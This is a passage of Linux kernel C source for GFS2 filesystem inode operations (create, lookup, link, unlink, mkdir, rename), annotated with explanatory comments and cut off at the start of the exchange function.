		if (error)
			goto fail_quota_locks;
	}

	error = gfs2_dir_add(&dip->i_inode, name, ip, da);

	gfs2_trans_end(sdp);
fail_ipreserv:
	gfs2_inplace_release(dip);
fail_quota_locks:
	gfs2_quota_unlock(dip);
	return error;
}
/*
 * gfs2_initxattrs - LSM callback: apply each security xattr supplied by
 * security_inode_init_security(), stopping at the first failure.
 */
static int gfs2_initxattrs(struct inode *inode, const struct xattr *xattr_array,
			   void *fs_info)
{
	const struct xattr *xattr = xattr_array;
	int err = 0;

	while (xattr->name != NULL) {
		err = __gfs2_xattr_set(inode, xattr->name, xattr->value,
				       xattr->value_len, 0,
				       GFS2_EATYPE_SECURITY);
		if (err < 0)
			break;
		xattr++;
	}
	return err;
}
/**
* gfs2_create_inode - Create a new inode
* @dir: The parent directory
* @dentry: The new dentry
* @file: If non-NULL, the file which is being opened
* @mode: The permissions on the new inode
* @dev: For device nodes, this is the device number
* @symname: For symlinks, this is the link destination
* @size: The initial size of the inode (ignored for directories)
*
* Returns: 0 on success, or error code
*/
static int gfs2_create_inode(struct inode *dir, struct dentry *dentry,
			     struct file *file,
			     umode_t mode, dev_t dev, const char *symname,
			     unsigned int size, int excl, int *opened)
{
	const struct qstr *name = &dentry->d_name;
	struct posix_acl *default_acl, *acl;
	struct gfs2_holder ghs[2]; /* [0] = parent dir, [1] = new inode */
	struct inode *inode = NULL;
	struct gfs2_inode *dip = GFS2_I(dir), *ip;
	struct gfs2_sbd *sdp = GFS2_SB(&dip->i_inode);
	struct gfs2_glock *io_gl;
	int error, free_vfs_inode = 0;
	u32 aflags = 0;
	unsigned blocks = 1; /* dinode block; +1 below if ACL xattrs needed */
	struct gfs2_diradd da = { .bh = NULL, .save_loc = 1, };

	if (!name->len || name->len > GFS2_FNAMESIZE)
		return -ENAMETOOLONG;

	error = gfs2_rs_alloc(dip);
	if (error)
		return error;

	error = gfs2_rindex_update(sdp);
	if (error)
		return error;

	error = gfs2_glock_nq_init(dip->i_gl, LM_ST_EXCLUSIVE, 0, ghs);
	if (error)
		goto fail;

	error = create_ok(dip, name, mode);
	if (error)
		goto fail_gunlock;

	/* If the name already exists, hand back the existing inode
	 * (or fail, depending on O_EXCL / requested type). */
	inode = gfs2_dir_search(dir, &dentry->d_name, !S_ISREG(mode) || excl);
	error = PTR_ERR(inode);
	if (!IS_ERR(inode)) {
		if (S_ISDIR(inode->i_mode)) {
			iput(inode);
			inode = ERR_PTR(-EISDIR);
			goto fail_gunlock;
		}
		d_instantiate(dentry, inode);
		error = 0;
		if (file) {
			if (S_ISREG(inode->i_mode))
				error = finish_open(file, dentry, gfs2_open_common, opened);
			else
				error = finish_no_open(file, NULL);
		}
		gfs2_glock_dq_uninit(ghs);
		return error;
	} else if (error != -ENOENT) {
		goto fail_gunlock;
	}

	error = gfs2_diradd_alloc_required(dir, name, &da);
	if (error < 0)
		goto fail_gunlock;

	inode = new_inode(sdp->sd_vfs);
	error = -ENOMEM;
	if (!inode)
		goto fail_gunlock;

	error = posix_acl_create(dir, &mode, &default_acl, &acl);
	if (error)
		goto fail_free_vfs_inode;

	ip = GFS2_I(inode);
	error = gfs2_rs_alloc(ip);
	if (error)
		goto fail_free_acls;

	/* Initialise the in-core inode before allocating disk space. */
	inode->i_mode = mode;
	set_nlink(inode, S_ISDIR(mode) ? 2 : 1);
	inode->i_rdev = dev;
	inode->i_size = size;
	inode->i_atime = inode->i_mtime = inode->i_ctime = CURRENT_TIME;
	gfs2_set_inode_blocks(inode, 1);
	munge_mode_uid_gid(dip, inode);
	check_and_update_goal(dip);
	ip->i_goal = dip->i_goal;
	ip->i_diskflags = 0;
	ip->i_eattr = 0;
	ip->i_height = 0;
	ip->i_depth = 0;
	ip->i_entries = 0;

	switch(mode & S_IFMT) {
	case S_IFREG:
		/* Inherit journaled-data mode from parent or tunable. */
		if ((dip->i_diskflags & GFS2_DIF_INHERIT_JDATA) ||
		    gfs2_tune_get(sdp, gt_new_files_jdata))
			ip->i_diskflags |= GFS2_DIF_JDATA;
		gfs2_set_aops(inode);
		break;
	case S_IFDIR:
		ip->i_diskflags |= (dip->i_diskflags & GFS2_DIF_INHERIT_JDATA);
		ip->i_diskflags |= GFS2_DIF_JDATA;
		ip->i_entries = 2; /* "." and ".." */
		break;
	}
	gfs2_set_inode_flags(inode);

	/* Spread top-level directories across resource groups (Orlov). */
	if ((GFS2_I(d_inode(sdp->sd_root_dir)) == dip) ||
	    (dip->i_diskflags & GFS2_DIF_TOPDIR))
		aflags |= GFS2_AF_ORLOV;

	/* ACLs need an extra block for the xattr data. */
	if (default_acl || acl)
		blocks++;

	error = alloc_dinode(ip, aflags, &blocks);
	if (error)
		goto fail_free_inode;

	gfs2_set_inode_blocks(inode, blocks);

	error = gfs2_glock_get(sdp, ip->i_no_addr, &gfs2_inode_glops, CREATE, &ip->i_gl);
	if (error)
		goto fail_free_inode;

	ip->i_gl->gl_object = ip;
	error = gfs2_glock_nq_init(ip->i_gl, LM_ST_EXCLUSIVE, GL_SKIP, ghs + 1);
	if (error)
		goto fail_free_inode;

	error = gfs2_trans_begin(sdp, blocks, 0);
	if (error)
		goto fail_gunlock2;

	if (blocks > 1) {
		/* The second block holds the (initially empty) xattrs. */
		ip->i_eattr = ip->i_no_addr + 1;
		gfs2_init_xattr(ip);
	}
	init_dinode(dip, ip, symname);
	gfs2_trans_end(sdp);

	error = gfs2_glock_get(sdp, ip->i_no_addr, &gfs2_iopen_glops, CREATE, &io_gl);
	if (error)
		goto fail_gunlock2;

	error = gfs2_glock_nq_init(io_gl, LM_ST_SHARED, GL_EXACT, &ip->i_iopen_gh);
	if (error)
		goto fail_gunlock2;

	ip->i_iopen_gh.gh_gl->gl_object = ip;
	gfs2_glock_put(io_gl); /* the holder keeps its own reference */
	gfs2_set_iop(inode);
	insert_inode_hash(inode);

	if (default_acl) {
		error = gfs2_set_acl(inode, default_acl, ACL_TYPE_DEFAULT);
		posix_acl_release(default_acl);
	}
	if (acl) {
		if (!error)
			error = gfs2_set_acl(inode, acl, ACL_TYPE_ACCESS);
		posix_acl_release(acl);
	}

	if (error)
		goto fail_gunlock3;

	error = security_inode_init_security(&ip->i_inode, &dip->i_inode, name,
					     &gfs2_initxattrs, NULL);
	if (error)
		goto fail_gunlock3;

	/* Finally make the new inode visible in the parent directory. */
	error = link_dinode(dip, name, ip, &da);
	if (error)
		goto fail_gunlock3;

	mark_inode_dirty(inode);
	d_instantiate(dentry, inode);
	if (file) {
		*opened |= FILE_CREATED;
		error = finish_open(file, dentry, gfs2_open_common, opened);
	}
	gfs2_glock_dq_uninit(ghs);
	gfs2_glock_dq_uninit(ghs + 1);
	return error;

fail_gunlock3:
	gfs2_glock_dq_uninit(ghs + 1);
	if (ip->i_gl)
		gfs2_glock_put(ip->i_gl);
	goto fail_gunlock;
fail_gunlock2:
	gfs2_glock_dq_uninit(ghs + 1);
fail_free_inode:
	if (ip->i_gl)
		gfs2_glock_put(ip->i_gl);
	gfs2_rs_delete(ip, NULL);
fail_free_acls:
	if (default_acl)
		posix_acl_release(default_acl);
	if (acl)
		posix_acl_release(acl);
fail_free_vfs_inode:
	free_vfs_inode = 1;
fail_gunlock:
	gfs2_dir_no_add(&da);
	gfs2_glock_dq_uninit(ghs);
	if (inode && !IS_ERR(inode)) {
		/* Tear down the partially constructed inode. */
		clear_nlink(inode);
		if (!free_vfs_inode)
			mark_inode_dirty(inode);
		set_bit(free_vfs_inode ? GIF_FREE_VFS_INODE : GIF_ALLOC_FAILED,
			&GFS2_I(inode)->i_flags);
		iput(inode);
	}
fail:
	return error;
}
/**
* gfs2_create - Create a file
* @dir: The directory in which to create the file
* @dentry: The dentry of the new file
* @mode: The mode of the new file
*
* Returns: errno
*/
static int gfs2_create(struct inode *dir, struct dentry *dentry,
		       umode_t mode, bool excl)
{
	/* Delegate to the common create path: regular file, no device,
	 * no symlink target, zero initial size, no atomic-open state. */
	return gfs2_create_inode(dir, dentry, NULL, S_IFREG | mode, 0, NULL, 0, excl, NULL);
}
/**
* __gfs2_lookup - Look up a filename in a directory and return its inode
* @dir: The directory inode
* @dentry: The dentry of the new inode
* @file: File to be opened
* @opened: atomic_open flags
*
*
* Returns: errno
*/
static struct dentry *__gfs2_lookup(struct inode *dir, struct dentry *dentry,
				    struct file *file, int *opened)
{
	struct inode *inode;
	struct dentry *d;
	struct gfs2_holder gh;
	struct gfs2_glock *gl;
	int error;

	inode = gfs2_lookupi(dir, &dentry->d_name, 0);
	if (inode == NULL) {
		/* Negative dentry: cache the absence of the name. */
		d_add(dentry, NULL);
		return NULL;
	}
	if (IS_ERR(inode))
		return ERR_CAST(inode);

	/* Hold the inode glock across d_splice_alias()/finish_open(). */
	gl = GFS2_I(inode)->i_gl;
	error = gfs2_glock_nq_init(gl, LM_ST_SHARED, LM_FLAG_ANY, &gh);
	if (error) {
		iput(inode);
		return ERR_PTR(error);
	}

	d = d_splice_alias(inode, dentry);
	if (IS_ERR(d)) {
		gfs2_glock_dq_uninit(&gh);
		return d;
	}
	if (file && S_ISREG(inode->i_mode))
		error = finish_open(file, dentry, gfs2_open_common, opened);

	gfs2_glock_dq_uninit(&gh);
	if (error) {
		dput(d);
		return ERR_PTR(error);
	}
	return d;
}
/* Plain VFS ->lookup: no atomic-open file state to pass along. */
static struct dentry *gfs2_lookup(struct inode *dir, struct dentry *dentry,
				  unsigned flags)
{
	return __gfs2_lookup(dir, dentry, NULL, NULL);
}
/**
* gfs2_link - Link to a file
* @old_dentry: The inode to link
* @dir: Add link to this directory
* @dentry: The name of the link
*
* Link the inode in "old_dentry" into the directory "dir" with the
* name in "dentry".
*
* Returns: errno
*/
static int gfs2_link(struct dentry *old_dentry, struct inode *dir,
		     struct dentry *dentry)
{
	struct gfs2_inode *dip = GFS2_I(dir);
	struct gfs2_sbd *sdp = GFS2_SB(dir);
	struct inode *inode = d_inode(old_dentry);
	struct gfs2_inode *ip = GFS2_I(inode);
	struct gfs2_holder ghs[2]; /* [0] = parent dir, [1] = child */
	struct buffer_head *dibh;
	struct gfs2_diradd da = { .bh = NULL, .save_loc = 1, };
	int error;

	/* Hard links to directories are not permitted. */
	if (S_ISDIR(inode->i_mode))
		return -EPERM;

	error = gfs2_rs_alloc(dip);
	if (error)
		return error;

	/* Lock parent then child, in that order. */
	gfs2_holder_init(dip->i_gl, LM_ST_EXCLUSIVE, 0, ghs);
	gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + 1);

	error = gfs2_glock_nq(ghs); /* parent */
	if (error)
		goto out_parent;

	error = gfs2_glock_nq(ghs + 1); /* child */
	if (error)
		goto out_child;

	error = -ENOENT;
	if (inode->i_nlink == 0)
		goto out_gunlock;

	error = gfs2_permission(dir, MAY_WRITE | MAY_EXEC);
	if (error)
		goto out_gunlock;

	error = gfs2_dir_check(dir, &dentry->d_name, NULL);
	switch (error) {
	case -ENOENT:
		break;
	case 0:
		/* Name already exists; fall through to the error exit. */
		error = -EEXIST;
	default:
		goto out_gunlock;
	}

	/* Re-validate both inodes now that the glocks are held. */
	error = -EINVAL;
	if (!dip->i_inode.i_nlink)
		goto out_gunlock;
	error = -EFBIG;
	if (dip->i_entries == (u32)-1)
		goto out_gunlock;
	error = -EPERM;
	if (IS_IMMUTABLE(inode) || IS_APPEND(inode))
		goto out_gunlock;
	error = -EINVAL;
	if (!ip->i_inode.i_nlink)
		goto out_gunlock;
	error = -EMLINK;
	if (ip->i_inode.i_nlink == (u32)-1)
		goto out_gunlock;

	error = gfs2_diradd_alloc_required(dir, &dentry->d_name, &da);
	if (error < 0)
		goto out_gunlock;

	if (da.nr_blocks) {
		/* Directory must grow: reserve quota and rgrp space. */
		struct gfs2_alloc_parms ap = { .target = da.nr_blocks, };
		error = gfs2_quota_lock_check(dip, &ap);
		if (error)
			goto out_gunlock;

		error = gfs2_inplace_reserve(dip, &ap);
		if (error)
			goto out_gunlock_q;

		error = gfs2_trans_begin(sdp, gfs2_trans_da_blks(dip, &da, 2), 0);
		if (error)
			goto out_ipres;
	} else {
		error = gfs2_trans_begin(sdp, 2 * RES_DINODE + RES_LEAF, 0);
		if (error)
			goto out_ipres;
	}

	error = gfs2_meta_inode_buffer(ip, &dibh);
	if (error)
		goto out_end_trans;

	error = gfs2_dir_add(dir, &dentry->d_name, ip, &da);
	if (error)
		goto out_brelse;

	/* Bump the target's link count inside the transaction. */
	gfs2_trans_add_meta(ip->i_gl, dibh);
	inc_nlink(&ip->i_inode);
	ip->i_inode.i_ctime = CURRENT_TIME;
	ihold(inode);
	d_instantiate(dentry, inode);
	mark_inode_dirty(inode);

out_brelse:
	brelse(dibh);
out_end_trans:
	gfs2_trans_end(sdp);
out_ipres:
	if (da.nr_blocks)
		gfs2_inplace_release(dip);
out_gunlock_q:
	if (da.nr_blocks)
		gfs2_quota_unlock(dip);
out_gunlock:
	gfs2_dir_no_add(&da);
	gfs2_glock_dq(ghs + 1);
out_child:
	gfs2_glock_dq(ghs);
out_parent:
	gfs2_holder_uninit(ghs);
	gfs2_holder_uninit(ghs + 1);
	return error;
}
/*
 * gfs2_unlink_ok - check to see that an inode is still in a directory
 * @dip: the directory
 * @name: the name of the file
 * @ip: the inode
 *
 * Assumes that the lock on (at least) @dip is held.
 *
 * Returns: 0 if the parent/child relationship is correct, errno if it isn't
 */
static int gfs2_unlink_ok(struct gfs2_inode *dip, const struct qstr *name,
			  const struct gfs2_inode *ip)
{
	int error;

	if (IS_IMMUTABLE(&ip->i_inode) || IS_APPEND(&ip->i_inode))
		return -EPERM;

	/* Sticky directory: only the owner of the directory or of the
	 * file itself (or CAP_FOWNER) may remove the entry. */
	if ((dip->i_inode.i_mode & S_ISVTX) &&
	    !uid_eq(dip->i_inode.i_uid, current_fsuid()) &&
	    !uid_eq(ip->i_inode.i_uid, current_fsuid()) && !capable(CAP_FOWNER))
		return -EPERM;

	if (IS_APPEND(&dip->i_inode))
		return -EPERM;

	error = gfs2_permission(&dip->i_inode, MAY_WRITE | MAY_EXEC);
	if (error)
		return error;

	/* Finally, confirm @name in @dip still refers to @ip. */
	return gfs2_dir_check(&dip->i_inode, name, ip);
}
/**
 * gfs2_unlink_inode - Removes an inode from its parent dir and unlinks it
 * @dip: The parent directory
 * @dentry: The dentry whose name/inode are to be removed
 *
 * Called with all the locks and in a transaction. This will only be
 * called for a directory after it has been checked to ensure it is empty.
 *
 * Returns: 0 on success, or an error
 */
static int gfs2_unlink_inode(struct gfs2_inode *dip,
                             const struct dentry *dentry)
{
        struct inode *inode = d_inode(dentry);
        struct gfs2_inode *ip = GFS2_I(inode);
        int error;

        /* Remove the directory entry first; nothing to undo if this fails */
        error = gfs2_dir_del(dip, dentry);
        if (error)
                return error;

        /* NOTE(review): i_entries is zeroed unconditionally, even for
           non-directories — presumably harmless for regular files; confirm */
        ip->i_entries = 0;
        inode->i_ctime = CURRENT_TIME;
        /* A directory being removed here is known empty, so its link count
           ("." and the parent entry) drops straight to zero */
        if (S_ISDIR(inode->i_mode))
                clear_nlink(inode);
        else
                drop_nlink(inode);
        mark_inode_dirty(inode);
        /* Last link gone: mark the dinode for deallocation */
        if (inode->i_nlink == 0)
                gfs2_unlink_di(inode);
        return 0;
}
/**
 * gfs2_unlink - Unlink an inode (this does rmdir as well)
 * @dir: The inode of the directory containing the inode to unlink
 * @dentry: The file itself
 *
 * This routine uses the type of the inode as a flag to figure out
 * whether this is an unlink or an rmdir.
 *
 * Locks taken, in order: parent glock, child glock, then the resource
 * group glock covering the child's dinode block.
 *
 * Returns: errno
 */
static int gfs2_unlink(struct inode *dir, struct dentry *dentry)
{
        struct gfs2_inode *dip = GFS2_I(dir);
        struct gfs2_sbd *sdp = GFS2_SB(dir);
        struct inode *inode = d_inode(dentry);
        struct gfs2_inode *ip = GFS2_I(inode);
        struct gfs2_holder ghs[3];
        struct gfs2_rgrpd *rgd;
        int error;

        error = gfs2_rindex_update(sdp);
        if (error)
                return error;

        error = -EROFS;

        gfs2_holder_init(dip->i_gl, LM_ST_EXCLUSIVE, 0, ghs);
        gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + 1);

        /* The resource group holding the dinode is needed so the unlink
           can be recorded; failure to find it leaves error == -EROFS */
        rgd = gfs2_blk2rgrpd(sdp, ip->i_no_addr, 1);
        if (!rgd)
                goto out_inodes;

        gfs2_holder_init(rgd->rd_gl, LM_ST_EXCLUSIVE, 0, ghs + 2);

        error = gfs2_glock_nq(ghs); /* parent */
        if (error)
                goto out_parent;

        error = gfs2_glock_nq(ghs + 1); /* child */
        if (error)
                goto out_child;

        error = -ENOENT;
        if (inode->i_nlink == 0)
                goto out_rgrp;

        /* rmdir: refuse unless the directory is empty ("." and "..") */
        if (S_ISDIR(inode->i_mode)) {
                error = -ENOTEMPTY;
                if (ip->i_entries > 2 || inode->i_nlink > 2)
                        goto out_rgrp;
        }

        error = gfs2_glock_nq(ghs + 2); /* rgrp */
        if (error)
                goto out_rgrp;

        error = gfs2_unlink_ok(dip, &dentry->d_name, ip);
        if (error)
                goto out_gunlock;

        error = gfs2_trans_begin(sdp, 2*RES_DINODE + 3*RES_LEAF + RES_RG_BIT, 0);
        if (error)
                goto out_gunlock; /* no transaction was opened, so do not
                                     call gfs2_trans_end() on this path */

        error = gfs2_unlink_inode(dip, dentry);
        gfs2_trans_end(sdp);

out_gunlock:
        gfs2_glock_dq(ghs + 2);
out_rgrp:
        gfs2_glock_dq(ghs + 1);
out_child:
        gfs2_glock_dq(ghs);
out_parent:
        gfs2_holder_uninit(ghs + 2);
out_inodes:
        gfs2_holder_uninit(ghs + 1);
        gfs2_holder_uninit(ghs);
        return error;
}
/**
 * gfs2_symlink - Create a symlink
 * @dir: The directory to create the symlink in
 * @dentry: The dentry to put the symlink in
 * @symname: The thing which the link points to
 *
 * The target must fit in the stuffed portion of a dinode block,
 * otherwise -ENAMETOOLONG is returned.
 *
 * Returns: errno
 */
static int gfs2_symlink(struct inode *dir, struct dentry *dentry,
                        const char *symname)
{
        struct gfs2_sbd *sdp = GFS2_SB(dir);
        unsigned int len = strlen(symname);

        /* Room left in a dinode block after the header, minus the NUL */
        if (len > sdp->sd_sb.sb_bsize - sizeof(struct gfs2_dinode) - 1)
                return -ENAMETOOLONG;

        return gfs2_create_inode(dir, dentry, NULL, S_IFLNK | S_IRWXUGO, 0,
                                 symname, len, 0, NULL);
}
/**
 * gfs2_mkdir - Make a directory
 * @dir: The parent directory of the new one
 * @dentry: The dentry of the new directory
 * @mode: The mode of the new directory
 *
 * Returns: errno
 */
static int gfs2_mkdir(struct inode *dir, struct dentry *dentry, umode_t mode)
{
        /* Initial directory payload: whatever fits in the dinode block
           once the on-disk header has been accounted for */
        unsigned max_stuffed = GFS2_SB(dir)->sd_sb.sb_bsize -
                               sizeof(struct gfs2_dinode);

        return gfs2_create_inode(dir, dentry, NULL, S_IFDIR | mode, 0, NULL,
                                 max_stuffed, 0, NULL);
}
/**
 * gfs2_mknod - Make a special file
 * @dir: The directory in which the special file will reside
 * @dentry: The dentry of the special file
 * @mode: The mode of the special file
 * @dev: The device specification of the special file
 *
 * Returns: errno
 */
static int gfs2_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
                      dev_t dev)
{
        /* Thin wrapper: all the work happens in gfs2_create_inode() */
        return gfs2_create_inode(dir, dentry, NULL, mode, dev, NULL, 0, 0, NULL);
}
/**
 * gfs2_atomic_open - Atomically open a file
 * @dir: The directory
 * @dentry: The proposed new entry
 * @file: The proposed new struct file
 * @flags: open flags
 * @mode: File mode
 * @opened: Flag to say whether the file has been opened or not
 *
 * Returns: error code or 0 for success
 */
static int gfs2_atomic_open(struct inode *dir, struct dentry *dentry,
                            struct file *file, unsigned flags,
                            umode_t mode, int *opened)
{
        struct dentry *d;
        bool excl = !!(flags & O_EXCL);

        /* A hashed dentry was already looked up by the VFS; go straight
           to the create decision */
        if (!d_unhashed(dentry))
                goto skip_lookup;

        d = __gfs2_lookup(dir, dentry, file, opened);
        if (IS_ERR(d))
                return PTR_ERR(d);
        /* Lookup may return a different (aliased) dentry; use it if so */
        if (d != NULL)
                dentry = d;
        if (d_really_is_positive(dentry)) {
                /* Existing file: either hand it back for a normal open,
                   or it was opened during lookup and we are done */
                if (!(*opened & FILE_OPENED))
                        return finish_no_open(file, d);
                dput(d);
                return 0;
        }

        /* Negative dentry here implies lookup returned NULL */
        BUG_ON(d != NULL);

skip_lookup:
        if (!(flags & O_CREAT))
                return -ENOENT;

        return gfs2_create_inode(dir, dentry, file, S_IFREG | mode, 0, NULL, 0, excl, opened);
}
/**
 * gfs2_ok_to_move - check if it's ok to move a directory to another directory
 * @this: move this
 * @to: to here
 *
 * Follow @to back to the root and make sure we don't encounter @this.
 * Assumes we already hold the rename lock.
 *
 * Returns: errno (-EINVAL if @this is an ancestor of @to)
 */
static int gfs2_ok_to_move(struct gfs2_inode *this, struct gfs2_inode *to)
{
        struct inode *dir = &to->i_inode;
        struct super_block *sb = dir->i_sb;
        struct inode *tmp;
        int error = 0;

        /* Take a reference so the unconditional iput() below is balanced
           on every exit from the loop */
        igrab(dir);

        for (;;) {
                /* Found @this on the path to root: the move would create
                   a cycle */
                if (dir == &this->i_inode) {
                        error = -EINVAL;
                        break;
                }
                if (dir == d_inode(sb->s_root)) {
                        error = 0;
                        break;
                }

                /* Step one level up via ".." */
                tmp = gfs2_lookupi(dir, &gfs2_qdotdot, 1);
                if (!tmp) {
                        error = -ENOENT;
                        break;
                }
                if (IS_ERR(tmp)) {
                        error = PTR_ERR(tmp);
                        break;
                }

                /* Drop the old level's reference before walking on */
                iput(dir);
                dir = tmp;
        }

        iput(dir);

        return error;
}
/**
 * update_moved_ino - Update an inode that's being moved
 * @ip: The inode being moved
 * @ndip: The parent directory of the new filename
 * @dir_rename: True if ip is a directory
 *
 * For a directory, rewrites its ".." entry to point at @ndip.  For any
 * other inode, bumps the ctime and writes the dinode back.  Must be
 * called inside a transaction.
 *
 * Returns: errno
 */
static int update_moved_ino(struct gfs2_inode *ip, struct gfs2_inode *ndip,
                            int dir_rename)
{
        int error;
        struct buffer_head *dibh;

        /* Directory move: only the ".." back-pointer needs changing */
        if (dir_rename)
                return gfs2_dir_mvino(ip, &gfs2_qdotdot, ndip, DT_DIR);

        error = gfs2_meta_inode_buffer(ip, &dibh);
        if (error)
                return error;
        ip->i_inode.i_ctime = CURRENT_TIME;
        /* Add the dinode buffer to the transaction before rewriting it */
        gfs2_trans_add_meta(ip->i_gl, dibh);
        gfs2_dinode_out(ip, dibh->b_data);
        brelse(dibh);
        return 0;
}
/**
 * gfs2_rename - Rename a file
 * @odir: Parent directory of old file name
 * @odentry: The old dentry of the file
 * @ndir: Parent directory of new file name
 * @ndentry: The new dentry of the file
 *
 * Takes the filesystem-wide rename glock for cross-directory moves, then
 * up to five glocks (both parents, the source inode, the target inode if
 * it exists, and the target's resource group), runs all permission and
 * emptiness checks, and finally performs unlink-of-target + move inside
 * a single transaction.
 *
 * Returns: errno
 */
static int gfs2_rename(struct inode *odir, struct dentry *odentry,
                       struct inode *ndir, struct dentry *ndentry)
{
        struct gfs2_inode *odip = GFS2_I(odir);
        struct gfs2_inode *ndip = GFS2_I(ndir);
        struct gfs2_inode *ip = GFS2_I(d_inode(odentry));
        struct gfs2_inode *nip = NULL;
        struct gfs2_sbd *sdp = GFS2_SB(odir);
        struct gfs2_holder ghs[5], r_gh = { .gh_gl = NULL, };
        struct gfs2_rgrpd *nrgd;
        unsigned int num_gh;
        int dir_rename = 0;
        struct gfs2_diradd da = { .nr_blocks = 0, .save_loc = 0, };
        unsigned int x;
        int error;

        if (d_really_is_positive(ndentry)) {
                nip = GFS2_I(d_inode(ndentry));
                /* Renaming a file onto itself is a no-op */
                if (ip == nip)
                        return 0;
        }

        error = gfs2_rindex_update(sdp);
        if (error)
                return error;

        error = gfs2_rs_alloc(ndip);
        if (error)
                return error;

        if (odip != ndip) {
                /* Cross-directory move: serialize against all other
                   renames on this filesystem */
                error = gfs2_glock_nq_init(sdp->sd_rename_gl, LM_ST_EXCLUSIVE,
                                           0, &r_gh);
                if (error)
                        goto out;

                if (S_ISDIR(ip->i_inode.i_mode)) {
                        dir_rename = 1;
                        /* don't move a directory into its subdir */
                        error = gfs2_ok_to_move(ip, ndip);
                        if (error)
                                goto out_gunlock_r;
                }
        }

        num_gh = 1;
        gfs2_holder_init(odip->i_gl, LM_ST_EXCLUSIVE, 0, ghs);
        if (odip != ndip) {
                gfs2_holder_init(ndip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
                num_gh++;
        }
        gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
        num_gh++;

        if (nip) {
                gfs2_holder_init(nip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh);
                num_gh++;
                /* grab the resource lock for unlink flag twiddling
                 * this is the case of the target file already existing
                 * so we unlink before doing the rename
                 */
                nrgd = gfs2_blk2rgrpd(sdp, nip->i_no_addr, 1);
                if (nrgd)
                        gfs2_holder_init(nrgd->rd_gl, LM_ST_EXCLUSIVE, 0, ghs + num_gh++);
        }

        for (x = 0; x < num_gh; x++) {
                error = gfs2_glock_nq(ghs + x);
                if (error)
                        goto out_gunlock;
        }

        error = -ENOENT;
        if (ip->i_inode.i_nlink == 0)
                goto out_gunlock;

        /* Check out the old directory */
        error = gfs2_unlink_ok(odip, &odentry->d_name, ip);
        if (error)
                goto out_gunlock;

        /* Check out the new directory */
        if (nip) {
                error = gfs2_unlink_ok(ndip, &ndentry->d_name, nip);
                if (error)
                        goto out_gunlock;

                if (nip->i_inode.i_nlink == 0) {
                        error = -EAGAIN;
                        goto out_gunlock;
                }

                if (S_ISDIR(nip->i_inode.i_mode)) {
                        /* i_entries < 2 means "." or ".." is missing:
                           on-disk inconsistency */
                        if (nip->i_entries < 2) {
                                gfs2_consist_inode(nip);
                                error = -EIO;
                                goto out_gunlock;
                        }
                        if (nip->i_entries > 2) {
                                error = -ENOTEMPTY;
                                goto out_gunlock;
                        }
                }
        } else {
                error = gfs2_permission(ndir, MAY_WRITE | MAY_EXEC);
                if (error)
                        goto out_gunlock;

                /* Target name must not have appeared in the meantime;
                   the case 0 -> default fallthrough is intentional */
                error = gfs2_dir_check(ndir, &ndentry->d_name, NULL);
                switch (error) {
                case -ENOENT:
                        error = 0;
                        break;
                case 0:
                        error = -EEXIST;
                default:
                        goto out_gunlock;
                }

                if (odip != ndip) {
                        if (!ndip->i_inode.i_nlink) {
                                error = -ENOENT;
                                goto out_gunlock;
                        }
                        if (ndip->i_entries == (u32)-1) {
                                error = -EFBIG;
                                goto out_gunlock;
                        }
                        if (S_ISDIR(ip->i_inode.i_mode) &&
                            ndip->i_inode.i_nlink == (u32)-1) {
                                error = -EMLINK;
                                goto out_gunlock;
                        }
                }
        }

        /* Check out the dir to be renamed */
        if (dir_rename) {
                error = gfs2_permission(d_inode(odentry), MAY_WRITE);
                if (error)
                        goto out_gunlock;
        }

        if (nip == NULL) {
                error = gfs2_diradd_alloc_required(ndir, &ndentry->d_name, &da);
                if (error)
                        goto out_gunlock;
        }

        if (da.nr_blocks) {
                struct gfs2_alloc_parms ap = { .target = da.nr_blocks, };
                error = gfs2_quota_lock_check(ndip, &ap);
                if (error)
                        goto out_gunlock;

                error = gfs2_inplace_reserve(ndip, &ap);
                if (error)
                        goto out_gunlock_q;

                error = gfs2_trans_begin(sdp, gfs2_trans_da_blks(ndip, &da, 4) +
                                         4 * RES_LEAF + 4, 0);
                if (error)
                        goto out_ipreserv;
        } else {
                error = gfs2_trans_begin(sdp, 4 * RES_DINODE +
                                         5 * RES_LEAF + 4, 0);
                if (error)
                        goto out_gunlock;
        }

        /* Remove the target file, if it exists.  Abort the rename if the
           unlink fails, otherwise we would re-point a directory entry
           that is still in use. */
        if (nip) {
                error = gfs2_unlink_inode(ndip, ndentry);
                if (error)
                        goto out_end_trans;
        }

        error = update_moved_ino(ip, ndip, dir_rename);
        if (error)
                goto out_end_trans;

        error = gfs2_dir_del(odip, odentry);
        if (error)
                goto out_end_trans;

        error = gfs2_dir_add(ndir, &ndentry->d_name, ip, &da);
out_end_trans:
        gfs2_trans_end(sdp);
out_ipreserv:
        if (da.nr_blocks)
                gfs2_inplace_release(ndip);
out_gunlock_q:
        if (da.nr_blocks)
                gfs2_quota_unlock(ndip);
out_gunlock:
        gfs2_dir_no_add(&da);
        /* Holders 0..x-1 were queued; drop and uninit them in reverse */
        while (x--) {
                gfs2_glock_dq(ghs + x);
                gfs2_holder_uninit(ghs + x);
        }
out_gunlock_r:
        if (r_gh.gh_gl)
                gfs2_glock_dq_uninit(&r_gh);
out:
        return error;
}
/**
 * gfs2_exchange - exchange two files
 * @odir: Parent directory of old file name
 * @odentry: The old dentry of the file
 * @ndir: Parent directory of new file name
 * @ndentry: The new dentry of the file
 * @flags: The rename flags
 *
 * Implements RENAME_EXCHANGE: both entries must exist; the two inodes
 * swap places, fixing up ".." entries and parent link counts as needed.
 * All work is done under the rename glock (for cross-directory swaps)
 * plus up to four inode glocks, inside a single transaction.
 *
 * Returns: errno
 */
static int gfs2_exchange(struct inode *odir, struct dentry *odentry,
                         struct inode *ndir, struct dentry *ndentry,
                         unsigned int flags)
{
        struct gfs2_inode *odip = GFS2_I(odir);
        struct gfs2_inode *ndip = GFS2_I(ndir);
        struct gfs2_inode *oip = GFS2_I(odentry->d_inode);
        struct gfs2_inode *nip = GFS2_I(ndentry->d_inode);
        struct gfs2_sbd *sdp = GFS2_SB(odir);
        struct gfs2_holder ghs[5], r_gh = { .gh_gl = NULL, };
        unsigned int num_gh;
        unsigned int x;
        /* Modes are sampled once so directory-ness stays consistent
           throughout the function */
